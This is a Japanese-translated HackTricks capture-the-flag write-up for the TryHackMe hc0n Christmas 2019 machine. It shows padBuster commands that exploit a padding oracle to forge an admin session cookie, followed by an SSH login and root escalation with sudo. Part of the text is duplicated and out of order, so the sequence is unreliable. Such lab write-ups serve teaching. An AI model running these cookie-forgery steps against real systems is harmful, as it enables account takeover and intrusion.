hacktricks/ctf-write-ups/try-hack-me/hc0n-christmas-ctf-2019.md
2023-07-07 23:42:27 +00:00

5.7 KiB
Raw Blame History

hc0nクリスマスCTF - 2019

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥

列挙

私はツールLegionを使用してマシンの列挙を開始しました:

2つのポートが開いています80HTTPと22SSH

Webページでは新しいユーザーを登録することができ、ユーザー名の長さに応じてクッキーの長さが変わることに気づきました:

そして、クッキーのバイトを変更すると、このエラーが表示されます:

この情報とパディングオラクルの脆弱性を読むことで、それを悪用することができました:

perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy"

ユーザーadminを設定する:

$ ssh admin@10.10.10.10
admin@10.10.10.10's password: admin

admin@hc0n:~$ sudo -l
Matching Defaults entries for admin on hc0n:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User admin may run the following commands on hc0n:
    (ALL : ALL) ALL

admin@hc0n:~$ sudo su
root@hc0n:/home/admin# whoami
root

ユーザーadminを設定する:

$ ssh admin@10.10.10.10
admin@10.10.10.10のパスワード: admin

admin@hc0n:~$ sudo -l
adminのhc0nでの一致するデフォルトエントリ:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

ユーザーadminはhc0n上で以下のコマンドを実行できます:
    (ALL : ALL) ALL

admin@hc0n:~$ sudo su
root@hc0n:/home/admin# whoami
root
perl ./padBuster.pl http://10.10.231.5/index.php "GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" 8 -encoding 0 -cookies "hcon=GVrfxWD0mmxRM0RPLht/oUpybgnBn/Oy" -plaintext "user=admin"

☁️ HackTricks Cloud ☁️ -🐦 Twitter 🐦 - 🎙️ Twitch 🎙️ - 🎥 Youtube 🎥